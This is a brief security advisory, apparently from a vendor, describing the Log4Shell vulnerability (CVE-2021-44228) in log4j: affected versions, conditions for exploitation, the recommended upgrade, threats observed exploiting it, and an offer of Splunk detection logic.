CVE-2021-44228 / Log4Shell Vulnerability
A zero-day exploit has been identified for Java logging library "log4j" that could result in remote code execution. Affected versions include Log4j 2.0-beta9 up to 2.14.1 with service impacts to many Apache Struts configurations and cloud services such as Steam, Apple iCloud, and others. The exploit requires three components a vulnerable log4j version, any protocol that enables the attack to send the exploit string, and a log statement that can log the string from the request. Mitigation is available through an update with affected users recommended to update to log4j version "log4j-2.15.0-rc2". Threat researchers have identified a variety of threats Kinsing (cryptocurrency miner), Mirai Malware, Cobalt Strike, a new unidentified ransomware strain, and likely others, yet to be identified, taking advantage of the widespread vulnerability.
**For updates, detection content & logic, attack flow, threat examples & use case demonstrations - Check out our Log4Shell blog We're here to help by providing ready-to-deploy detection code (no strings attached) just reach out and we’ll send you the Splunk (SPL) detection logic, contact: firstname.lastname@example.org